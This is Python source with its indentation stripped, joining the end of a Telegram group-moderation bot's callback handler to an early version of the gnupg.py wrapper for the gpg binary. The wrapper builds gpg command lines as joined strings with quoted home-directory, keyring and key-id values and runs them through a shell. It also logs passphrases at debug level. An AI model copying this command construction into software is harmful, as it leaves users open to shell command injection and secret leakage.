if date[0] == "showSTreplylistBOT":
li = redis.hkeys("{}Nbot:STreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.STreplylistRm,callback_data=json.dumps(["delSTreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.STreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showGFreplylistBOT":
li = redis.hkeys("{}Nbot:GFreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"GFreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.GFreplylistRm,callback_data=json.dumps(["delGFreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.GFreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showVOreplylistBOT":
li = redis.hkeys("{}Nbot:VOreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"VOreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.VOreplylistRm,callback_data=json.dumps(["delVOreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.VOreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "listCH":
if int(date[1]) != 4:
Bot("editMessageText",{"chat_id":chatID,"text":r.settings.format(title),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[1])),"parse_mode":"html"})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[3]))})
else:
T = (redis.hget("{}Nbot:time_ck".format(BOT_ID),chatID) or 3)
m = (redis.hget("{}Nbot:max_msg".format(BOT_ID),chatID) or 10)
Bot("editMessageText",{"chat_id":chatID,"text":r.st2.format(T,m),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[1])),"parse_mode":"html"})
if date[0] == "listCH-res":
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st_res(client, callback_query,redis,int(date[1]))})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[1]))})
if date[0] == 'LU-res':
d = date[1].split("-")
lock = d[0]
lockres = d[0]+":"+d[1]
if redis.sismember("{}Nbot:{}".format(BOT_ID,lockres),chatID):
redis.srem("{}Nbot:{}".format(BOT_ID,lockres),chatID)
else:
redis.sadd("{}Nbot:{}".format(BOT_ID,lockres),chatID)
redis.sadd("{}Nbot:{}".format(BOT_ID,lock),chatID)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st_res(client, callback_query,redis,int(date[3]))})
if date[0] == 'LU':
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
save = redis.srem("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
else:
save = redis.sadd("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
if int(date[3]) != 4:
Bot("editMessageText",{"chat_id":chatID,"text":r.settings.format(title),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[3])),"parse_mode":"html"})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[3]))})
else:
T = (redis.hget("{}Nbot:time_ck".format(BOT_ID),chatID) or 3)
m = (redis.hget("{}Nbot:max_msg".format(BOT_ID),chatID) or 10)
Bot("editMessageText",{"chat_id":chatID,"text":r.st2.format(T,m),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[3])),"parse_mode":"html"})
if date[0] == "delListblockTEXTs":
redis.delete("{}Nbot:{}:blockTEXTs".format(BOT_ID,chatID))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delListbans":
arrays = redis.smembers("{}Nbot:{}:bans".format(BOT_ID,chatID))
for user in arrays:
GetGprank = GPranks(user,chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":user})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),user)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delListrestricteds":
arrays = redis.smembers("{}Nbot:{}:restricteds".format(BOT_ID,chatID))
for user in arrays:
GetGprank = GPranks(user,chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": user,"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
redis.srem("{}Nbot:{}:restricteds".format(BOT_ID,chatID),user)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "LandU":
if date[3] == "LtoU":
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
redis.srem("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[3] == "UtoL":
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
redis.sadd("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "Corder":
if date[1] == "bans":
if date[4] == "UtoB":
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3]):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
GetGprank = GPranks(date[3],chatID)
if GetGprank == "kicked":
Bot("kickChatMember",{"chat_id":chatID,"user_id":date[3]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[4] == "BtoU":
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3]):
GetGprank = GPranks(date[3],chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":date[3]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[1] == "restricteds":
if date[4] == "UtoB":
if redis.sismember("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3]):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
GetGprank = GPranks(date[3],chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": date[3],"can_send_messages": 0,"can_send_media_messages": 0,"can_send_other_messages": 0,"can_send_polls": 0,"can_change_info": 0,"can_add_web_page_previews": 0,"can_pin_messages": 0,})
redis.sadd("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[4] == "BtoU":
if redis.sismember("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3]):
GetGprank = GPranks(date[3],chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": date[3],"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
redis.srem("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delList":
H = date[1]
if H != "sudos" and H != "creator":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if H == "sudos":
redis.delete("{}Nbot:sudos".format(BOT_ID))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if H == "creator":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
redis.setex("{}Nbot:{}:floodClick".format(BOT_ID,userID), 3, User_click+1)
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id})
elif int(date[2]) != userID:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.notforyou,"show_alert":True})
redis.setex("{}Nbot:{}:floodClick".format(BOT_ID,userID), 3, User_click+1)
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.setDaemon(True)
t.start()
importlib.reload(U)
except Exception as e:
pass
|
gnupg.py
|
""" A wrapper for the 'gpg' command::
Portions of this module are derived from A.M. Kuchling's well-designed
GPG.py, using Richard Jones' updated version 1.3, which can be found
in the pycrypto CVS repository on Sourceforge:
http://pycrypto.cvs.sourceforge.net/viewvc/pycrypto/gpg/GPG.py
This module is *not* forward-compatible with amk's; some of the
old interface has changed. For instance, since I've added decrypt
functionality, I elected to initialize with a 'gnupghome' argument
instead of 'keyring', so that gpg can find both the public and secret
keyrings. I've also altered some of the returned objects in order for
the caller to not have to know as much about the internals of the
result classes.
While the rest of ISconf is released under the GPL, I am releasing
this single file under the same terms that A.M. Kuchling used for
pycrypto.
Steve Traugott, [email protected]
Thu Jun 23 21:27:20 PDT 2005
This version of the module has been modified from Steve Traugott's version
(see http://trac.t7a.org/isconf/browser/trunk/lib/python/isconf/GPG.py) by
Vinay Sajip to make use of the subprocess module (Steve's version uses os.fork()
and so does not work on Windows). Renamed to gnupg.py to avoid confusion with
the previous versions.
Modifications Copyright (C) 2008-2012 Vinay Sajip. All rights reserved.
A unittest harness (test_gnupg.py) has also been added.
"""
import locale
__version__ = "0.3.0"
__author__ = "Vinay Sajip"
__date__ = "$12-May-2012 10:49:10$"
try:
from io import StringIO
except ImportError:
from cStringIO import StringIO
import codecs
import locale
import logging
import os
import socket
from subprocess import Popen
from subprocess import PIPE
import sys
import threading
try:
import logging.NullHandler as NullHandler
except ImportError:
class NullHandler(logging.Handler):
def handle(self, record):
pass
try:
unicode
_py3k = False
except NameError:
_py3k = True
logger = logging.getLogger(__name__)
if not logger.handlers:
logger.addHandler(NullHandler())
def _copy_data(instream, outstream):
# Copy one stream to another
sent = 0
if hasattr(sys.stdin, 'encoding'):
enc = sys.stdin.encoding
else:
enc = 'ascii'
while True:
data = instream.read(1024)
if len(data) == 0:
break
sent += len(data)
logger.debug("sending chunk (%d): %r", sent, data[:256])
try:
outstream.write(data)
except UnicodeError:
outstream.write(data.encode(enc))
except:
# Can sometimes get 'broken pipe' errors even when the data has all
# been sent
logger.exception('Error sending data')
break
try:
outstream.close()
except IOError:
logger.warning('Exception occurred while closing: ignored', exc_info=1)
logger.debug("closed output, %d bytes sent", sent)
def _threaded_copy_data(instream, outstream):
wr = threading.Thread(target=_copy_data, args=(instream, outstream))
wr.setDaemon(True)
logger.debug('data copier: %r, %r, %r', wr, instream, outstream)
wr.start()
return wr
def _write_passphrase(stream, passphrase, encoding):
passphrase = '%s\n' % passphrase
passphrase = passphrase.encode(encoding)
stream.write(passphrase)
logger.debug("Wrote passphrase: %r", passphrase)
def _is_sequence(instance):
return isinstance(instance,list) or isinstance(instance,tuple)
def _make_binary_stream(s, encoding):
try:
if _py3k:
if isinstance(s, str):
s = s.encode(encoding)
else:
if type(s) is not str:
s = s.encode(encoding)
from io import BytesIO
rv = BytesIO(s)
except ImportError:
rv = StringIO(s)
return rv
class Verify(object):
"Handle status messages for --verify"
def __init__(self, gpg):
self.gpg = gpg
self.valid = False
self.fingerprint = self.creation_date = self.timestamp = None
self.signature_id = self.key_id = None
self.username = None
def __nonzero__(self):
return self.valid
__bool__ = __nonzero__
def handle_status(self, key, value):
if key in ("TRUST_UNDEFINED", "TRUST_NEVER", "TRUST_MARGINAL",
"TRUST_FULLY", "TRUST_ULTIMATE", "RSA_OR_IDEA", "NODATA",
"IMPORT_RES", "PLAINTEXT", "PLAINTEXT_LENGTH",
"POLICY_URL", "DECRYPTION_INFO", "DECRYPTION_OKAY"):
pass
elif key == "BADSIG":
self.valid = False
self.status = 'signature bad'
self.key_id, self.username = value.split(None, 1)
elif key == "GOODSIG":
self.valid = True
self.status = 'signature good'
self.key_id, self.username = value.split(None, 1)
elif key == "VALIDSIG":
(self.fingerprint,
self.creation_date,
self.sig_timestamp,
self.expire_timestamp) = value.split()[:4]
# may be different if signature is made with a subkey
self.pubkey_fingerprint = value.split()[-1]
self.status = 'signature valid'
elif key == "SIG_ID":
(self.signature_id,
self.creation_date, self.timestamp) = value.split()
elif key == "ERRSIG":
self.valid = False
(self.key_id,
algo, hash_algo,
cls,
self.timestamp) = value.split()[:5]
self.status = 'signature error'
elif key == "DECRYPTION_FAILED":
self.valid = False
self.key_id = value
self.status = 'decryption failed'
elif key == "NO_PUBKEY":
self.valid = False
self.key_id = value
self.status = 'no public key'
elif key in ("KEYEXPIRED", "SIGEXPIRED"):
# these are useless in verify, since they are spit out for any
# pub/subkeys on the key, not just the one doing the signing.
# if we want to check for signatures with expired key,
# the relevant flag is EXPKEYSIG.
pass
elif key in ("EXPKEYSIG", "REVKEYSIG"):
# signed with expired or revoked key
self.valid = False
self.key_id = value.split()[0]
self.status = (('%s %s') % (key[:3], key[3:])).lower()
else:
raise ValueError("Unknown status message: %r" % key)
class ImportResult(object):
"Handle status messages for --import"
counts = '''count no_user_id imported imported_rsa unchanged
n_uids n_subk n_sigs n_revoc sec_read sec_imported
sec_dups not_imported'''.split()
def __init__(self, gpg):
self.gpg = gpg
self.imported = []
self.results = []
self.fingerprints = []
for result in self.counts:
setattr(self, result, None)
def __nonzero__(self):
if self.not_imported: return False
if not self.fingerprints: return False
return True
__bool__ = __nonzero__
ok_reason = {
'0': 'Not actually changed',
'1': 'Entirely new key',
'2': 'New user IDs',
'4': 'New signatures',
'8': 'New subkeys',
'16': 'Contains private key',
}
problem_reason = {
'0': 'No specific reason given',
'1': 'Invalid Certificate',
'2': 'Issuer Certificate missing',
'3': 'Certificate Chain too long',
'4': 'Error storing certificate',
}
def handle_status(self, key, value):
if key == "IMPORTED":
# this duplicates info we already see in import_ok & import_problem
pass
elif key == "NODATA":
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'No valid data found'})
elif key == "IMPORT_OK":
reason, fingerprint = value.split()
reasons = []
for code, text in list(self.ok_reason.items()):
if int(reason) | int(code) == int(reason):
reasons.append(text)
reasontext = '\n'.join(reasons) + "\n"
self.results.append({'fingerprint': fingerprint,
'ok': reason, 'text': reasontext})
self.fingerprints.append(fingerprint)
elif key == "IMPORT_PROBLEM":
try:
reason, fingerprint = value.split()
except:
reason = value
fingerprint = '<unknown>'
self.results.append({'fingerprint': fingerprint,
'problem': reason, 'text': self.problem_reason[reason]})
elif key == "IMPORT_RES":
import_res = value.split()
for i in range(len(self.counts)):
setattr(self, self.counts[i], int(import_res[i]))
elif key == "KEYEXPIRED":
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'Key expired'})
elif key == "SIGEXPIRED":
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'Signature expired'})
else:
raise ValueError("Unknown status message: %r" % key)
def summary(self):
l = []
l.append('%d imported'%self.imported)
if self.not_imported:
l.append('%d not imported'%self.not_imported)
return ', '.join(l)
class ListKeys(list):
''' Handle status messages for --list-keys.
Handle pub and uid (relating the latter to the former).
Don't care about (info from src/DETAILS):
crt = X.509 certificate
crs = X.509 certificate and private key available
ssb = secret subkey (secondary key)
uat = user attribute (same as user id except for field 10).
sig = signature
rev = revocation signature
pkd = public key data (special field format, see below)
grp = reserved for gpgsm
rvk = revocation key
'''
def __init__(self, gpg):
self.gpg = gpg
self.curkey = None
self.fingerprints = []
self.uids = []
def key(self, args):
vars = ("""
type trust length algo keyid date expires dummy ownertrust uid
""").split()
self.curkey = {}
for i in range(len(vars)):
self.curkey[vars[i]] = args[i]
self.curkey['uids'] = []
if self.curkey['uid']:
self.curkey['uids'].append(self.curkey['uid'])
del self.curkey['uid']
self.curkey['subkeys'] = []
self.append(self.curkey)
pub = sec = key
def fpr(self, args):
self.curkey['fingerprint'] = args[9]
self.fingerprints.append(args[9])
def uid(self, args):
self.curkey['uids'].append(args[9])
self.uids.append(args[9])
def sub(self, args):
subkey = [args[4], args[11]]
self.curkey['subkeys'].append(subkey)
def handle_status(self, key, value):
pass
class Crypt(Verify):
"Handle status messages for --encrypt and --decrypt"
def __init__(self, gpg):
Verify.__init__(self, gpg)
self.data = ''
self.ok = False
self.status = ''
def __nonzero__(self):
if self.ok: return True
return False
__bool__ = __nonzero__
def __str__(self):
return self.data.decode(self.gpg.encoding, self.gpg.decode_errors)
def handle_status(self, key, value):
if key in ("ENC_TO", "USERID_HINT", "GOODMDC", "END_DECRYPTION",
"BEGIN_SIGNING", "NO_SECKEY", "ERROR", "NODATA",
"CARDCTRL"):
# in the case of ERROR, this is because a more specific error
# message will have come first
pass
elif key in ("NEED_PASSPHRASE", "BAD_PASSPHRASE", "GOOD_PASSPHRASE",
"MISSING_PASSPHRASE", "DECRYPTION_FAILED",
"KEY_NOT_CREATED"):
self.status = key.replace("_", " ").lower()
elif key == "NEED_PASSPHRASE_SYM":
self.status = 'need symmetric passphrase'
elif key == "BEGIN_DECRYPTION":
self.status = 'decryption incomplete'
elif key == "BEGIN_ENCRYPTION":
self.status = 'encryption incomplete'
elif key == "DECRYPTION_OKAY":
self.status = 'decryption ok'
self.ok = True
elif key == "END_ENCRYPTION":
self.status = 'encryption ok'
self.ok = True
elif key == "INV_RECP":
self.status = 'invalid recipient'
elif key == "KEYEXPIRED":
self.status = 'key expired'
elif key == "SIG_CREATED":
self.status = 'sig created'
elif key == "SIGEXPIRED":
self.status = 'sig expired'
else:
Verify.handle_status(self, key, value)
class GenKey(object):
"Handle status messages for --gen-key"
def __init__(self, gpg):
self.gpg = gpg
self.type = None
self.fingerprint = None
def __nonzero__(self):
if self.fingerprint: return True
return False
__bool__ = __nonzero__
def __str__(self):
return self.fingerprint or ''
def handle_status(self, key, value):
if key in ("PROGRESS", "GOOD_PASSPHRASE", "NODATA"):
pass
elif key == "KEY_CREATED":
(self.type,self.fingerprint) = value.split()
else:
raise ValueError("Unknown status message: %r" % key)
class DeleteResult(object):
"Handle status messages for --delete-key and --delete-secret-key"
def __init__(self, gpg):
self.gpg = gpg
self.status = 'ok'
def __str__(self):
return self.status
problem_reason = {
'1': 'No such key',
'2': 'Must delete secret key first',
'3': 'Ambigious specification',
}
def handle_status(self, key, value):
if key == "DELETE_PROBLEM":
self.status = self.problem_reason.get(value,
"Unknown error: %r" % value)
else:
raise ValueError("Unknown status message: %r" % key)
class Sign(object):
"Handle status messages for --sign"
def __init__(self, gpg):
self.gpg = gpg
self.type = None
self.fingerprint = None
def __nonzero__(self):
return self.fingerprint is not None
__bool__ = __nonzero__
def __str__(self):
return self.data.decode(self.gpg.encoding, self.gpg.decode_errors)
def handle_status(self, key, value):
if key in ("USERID_HINT", "NEED_PASSPHRASE", "BAD_PASSPHRASE",
"GOOD_PASSPHRASE", "BEGIN_SIGNING", "CARDCTRL"):
pass
elif key == "SIG_CREATED":
(self.type,
algo, hashalgo, cls,
self.timestamp, self.fingerprint
) = value.split()
else:
raise ValueError("Unknown status message: %r" % key)
class GPG(object):
decode_errors = 'strict'
result_map = {
'crypt': Crypt,
'delete': DeleteResult,
'generate': GenKey,
'import': ImportResult,
'list': ListKeys,
'sign': Sign,
'verify': Verify,
}
"Encapsulate access to the gpg executable"
def __init__(self, gpgbinary='gpg', gnupghome=None, verbose=False,
use_agent=False, keyring=None):
"""Initialize a GPG process wrapper. Options are:
gpgbinary -- full pathname for GPG binary.
gnupghome -- full pathname to where we can find the public and
private keyrings. Default is whatever gpg defaults to.
keyring -- name of alternative keyring file to use. If specified,
the default keyring is not used.
"""
self.gpgbinary = gpgbinary
self.gnupghome = gnupghome
self.keyring = keyring
self.verbose = verbose
self.use_agent = use_agent
self.encoding = locale.getpreferredencoding()
if self.encoding is None: # This happens on Jython!
self.encoding = sys.stdin.encoding
if gnupghome and not os.path.isdir(self.gnupghome):
os.makedirs(self.gnupghome,0x1C0)
p = self._open_subprocess(["--version"])
result = self.result_map['verify'](self) # any result will do for this
self._collect_output(p, result, stdin=p.stdin)
if p.returncode != 0:
raise ValueError("Error invoking gpg: %s: %s" % (p.returncode,
result.stderr))
def _open_subprocess(self, args, passphrase=False):
# Internal method: open a pipe to a GPG subprocess and return
# the file objects for communicating with it.
cmd = [self.gpgbinary, '--status-fd 2 --no-tty']
if self.gnupghome:
cmd.append('--homedir "%s" ' % self.gnupghome)
if self.keyring:
cmd.append('--no-default-keyring --keyring "%s" ' % self.keyring)
if passphrase:
cmd.append('--batch --passphrase-fd 0')
if self.use_agent:
cmd.append('--use-agent')
cmd.extend(args)
cmd = ' '.join(cmd)
if self.verbose:
print(cmd)
logger.debug("%s", cmd)
return Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
def _read_response(self, stream, result):
# Internal method: reads all the stderr output from GPG, taking notice
# only of lines that begin with the magic [GNUPG:] prefix.
#
# Calls methods on the response object for each valid token found,
# with the arg being the remainder of the status line.
lines = []
while True:
line = stream.readline()
if len(line) == 0:
break
lines.append(line)
line = line.rstrip()
if self.verbose:
print(line)
logger.debug("%s", line)
if line[0:9] == '[GNUPG:] ':
# Chop off the prefix
line = line[9:]
L = line.split(None, 1)
keyword = L[0]
if len(L) > 1:
value = L[1]
else:
value = ""
result.handle_status(keyword, value)
result.stderr = ''.join(lines)
def _read_data(self, stream, result):
# Read the contents of the file from GPG's stdout
chunks = []
while True:
data = stream.read(1024)
if len(data) == 0:
break
logger.debug("chunk: %r" % data[:256])
chunks.append(data)
if _py3k:
# Join using b'' or '', as appropriate
result.data = type(data)().join(chunks)
else:
result.data = ''.join(chunks)
def _collect_output(self, process, result, writer=None, stdin=None):
"""
Drain the subprocesses output streams, writing the collected output
to the result. If a writer thread (writing to the subprocess) is given,
make sure it's joined before returning. If a stdin stream is given,
close it before returning.
"""
stderr = codecs.getreader(self.encoding)(process.stderr)
rr = threading.Thread(target=self._read_response, args=(stderr, result))
rr.setDaemon(True)
logger.debug('stderr reader: %r', rr)
rr.start()
stdout = process.stdout
dr = threading.Thread(target=self._read_data, args=(stdout, result))
dr.setDaemon(True)
logger.debug('stdout reader: %r', dr)
dr.start()
dr.join()
rr.join()
if writer is not None:
writer.join()
process.wait()
if stdin is not None:
try:
stdin.close()
except IOError:
pass
stderr.close()
stdout.close()
def _handle_io(self, args, file, result, passphrase=None, binary=False):
"Handle a call to GPG - pass input data, collect output data"
# Handle a basic data call - pass data to GPG, handle the output
# including status information. Garbage In, Garbage Out :)
p = self._open_subprocess(args, passphrase is not None)
if not binary:
stdin = codecs.getwriter(self.encoding)(p.stdin)
else:
stdin = p.stdin
if passphrase:
_write_passphrase(stdin, passphrase, self.encoding)
writer = _threaded_copy_data(file, stdin)
self._collect_output(p, result, writer, stdin)
return result
#
# SIGNATURE METHODS
#
def sign(self, message, **kwargs):
"""sign message"""
f = _make_binary_stream(message, self.encoding)
result = self.sign_file(f, **kwargs)
f.close()
return result
def sign_file(self, file, keyid=None, passphrase=None, clearsign=True,
detach=False, binary=False):
"""sign file"""
logger.debug("sign_file: %s", file)
if binary:
args = ['-s']
else:
args = ['-sa']
# You can't specify detach-sign and clearsign together: gpg ignores
# the detach-sign in that case.
if detach:
args.append("--detach-sign")
elif clearsign:
args.append("--clearsign")
if keyid:
args.append('--default-key "%s"' % keyid)
result = self.result_map['sign'](self)
#We could use _handle_io here except for the fact that if the
#passphrase is bad, gpg bails and you can't write the message.
p = self._open_subprocess(args, passphrase is not None)
try:
stdin = p.stdin
if passphrase:
_write_passphrase(stdin, passphrase, self.encoding)
writer = _threaded_copy_data(file, stdin)
except IOError:
logging.exception("error writing message")
writer = None
self._collect_output(p, result, writer, stdin)
return result
def verify(self, data):
"""Verify the signature on the contents of the string 'data'
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input(Passphrase='foo')
>>> key = gpg.gen_key(input)
>>> assert key
>>> sig = gpg.sign('hello',keyid=key.fingerprint,passphrase='bar')
>>> assert not sig
>>> sig = gpg.sign('hello',keyid=key.fingerprint,passphrase='foo')
>>> assert sig
>>> verify = gpg.verify(sig.data)
>>> assert verify
"""
f = _make_binary_stream(data, self.encoding)
result = self.verify_file(f)
f.close()
return result
def verify_file(self, file, data_filename=None):
"Verify the signature on the contents of the file-like object 'file'"
logger.debug('verify_file: %r, %r', file, data_filename)
result = self.result_map['verify'](self)
args = ['--verify']
if data_filename is None:
self._handle_io(args, file, result, binary=True)
else:
logger.debug('Handling detached verification')
import tempfile
fd, fn = tempfile.mkstemp(prefix='pygpg')
s = file.read()
file.close()
logger.debug('Wrote to temp file: %r', s)
os.write(fd, s)
os.close(fd)
args.append(fn)
args.append('"%s"' % data_filename)
try:
p = self._open_subprocess(args)
self._collect_output(p, result, stdin=p.stdin)
finally:
os.unlink(fn)
return result
#
# KEY MANAGEMENT
#
def import_keys(self, key_data):
""" import the key_data into our keyring
>>> import shutil
>>> shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> print1 = result.fingerprint
>>> result = gpg.gen_key(input)
>>> print2 = result.fingerprint
>>> pubkey1 = gpg.export_keys(print1)
>>> seckey1 = gpg.export_keys(print1,secret=True)
>>> seckeys = gpg.list_keys(secret=True)
>>> pubkeys = gpg.list_keys()
>>> assert print1 in seckeys.fingerprints
>>> assert print1 in pubkeys.fingerprints
>>> str(gpg.delete_keys(print1))
'Must delete secret key first'
>>> str(gpg.delete_keys(print1,secret=True))
'ok'
>>> str(gpg.delete_keys(print1))
'ok'
>>> str(gpg.delete_keys("nosuchkey"))
'No such key'
>>> seckeys = gpg.list_keys(secret=True)
>>> pubkeys = gpg.list_keys()
>>> assert not print1 in seckeys.fingerprints
